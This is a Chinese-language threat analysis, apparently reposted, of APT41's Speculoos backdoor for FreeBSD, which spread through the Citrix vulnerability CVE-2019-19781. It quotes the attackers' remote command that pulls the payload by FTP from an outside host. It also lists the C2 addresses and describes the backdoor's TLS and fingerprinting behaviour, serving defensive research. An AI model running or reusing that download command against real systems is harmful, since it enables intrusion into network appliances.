如何進行APT41 Speculoos後門分析

FireEye在2020年3月25日發布了一份關於APT41全球攻擊活動的報告。此攻擊活動發生在1月20日至3月11日期間，主要對Citrix，Cisco和Zoho網路設備進行攻擊。研究人員根據WildFire和AutoFocus數據獲得了針對Citrix設備的攻擊樣本‘Speculoos’，也確定了北美，南美和歐洲等世界各地多個行業的受害者。

Speculoos的基於FreeBSD實現的，共識別出五個樣本，所有樣本檔案大小基本上相同，樣本集之間存在微小差異。 Speculoos利用CVE-2019-19781進行攻擊傳播，CVE-2019-19781影響Citrix Application Delivery Controller，Citrix Gateway和Citrix SD-WAN WANOP等設備，讓攻擊者遠端執行任意指令。

攻擊細節

攻擊者利用CVE-2019-19781遠端執行指令：'/usr/bin/ftp -o /tmp/bsd ftp://test：[redacted ]\@ 66.42.98[.]220/'。

第一波攻擊始於2020年1月31日晚上，使用的文件名為bsd，影響了美國的多個高等教育機構，美國醫療機構和愛爾蘭諮詢公司。第二波攻擊始於2020年2月24日，使用文件名為un，影響了哥倫比亞高等教育機構，奧地利製造組織，美國高等教育機構以及美國的州政府。

基於BSD系統的惡意軟體相對少見，此工具和特定Citrix網路設備有關，因此Speculoos很可能是APT41組織專門為此攻擊活動研發的。

二進位分析

在FreeBSD系統上可以執行使用GCC 4.2.1編譯的ELF可執行檔Speculoos後閘。此負載無法維持持對目標持久控制，因此攻擊者會使用額外的組件或其他攻擊手段來維持控制。執行後門後，會進入循環，該循環通過443端口與C2域通信，並調用函數

alibaba.zzux[.]com (119.28.139[.]120)

當通訊出現問題時，Speculoos會透過443連接埠嘗試連接到備用C2伺服器，其IP位址為119.28.139[.]20。如果連接到任一C2伺服器，它將與伺服器進行TLS握手。圖1顯示了發送到C2伺服器的資料包。

它請求login.live [.] com作為Server Name Indication（SNI）。

成功連接到C2並完成TLS握手後，Speculoos將對目標系統進行指紋識別，並將資料傳回C2伺服器。其結構如下表1所示。

資料透過TLS通道發送，並且Speculoos會等待伺服器的兩個位元組回應。在收到回應後，它會發送一個位元組（0xa）到C2，並進入循環以等待命令。表2為攻擊者可執行指令， 可讓攻擊者完全控制受害者係統。

研究中分析的兩個Speculoos樣本在功能上相同，兩者之間只有八個位元組不同，在收集系統資訊時'hostname'和'uname -s'命令不同導致。 uname -s傳回核心訊息，hostname傳回主機系統名稱。下圖顯示了兩個Speculoos樣本之間的二進位比較。

影響評估

網路可存取裝置允許未經授權的使用者遠端執行代會帶來很大的安全性問題，CVE- 2019-19781影響了多個面向互聯網的設備，攻擊者積極利用此漏洞來安裝自訂後門。攻擊者可以監視或修改整個組織的網路活動，因為所有受影響的組織的網路活動都必須透過這些網路設備進行。

預設可以透過這些裝置直接存取組織系統內部，攻擊者無需考慮內部網路橫向移動的問題。網路攻擊者有幾種手段攻擊，例如改變網路資料、注入惡意程式碼、實施中間人攻擊或將使用者引誘到虛假登入頁面以竊取登入資訊。

以上是如何進行APT41 Speculoos後門分析的詳細內容。更多資訊請關注PHP中文網其他相關文章！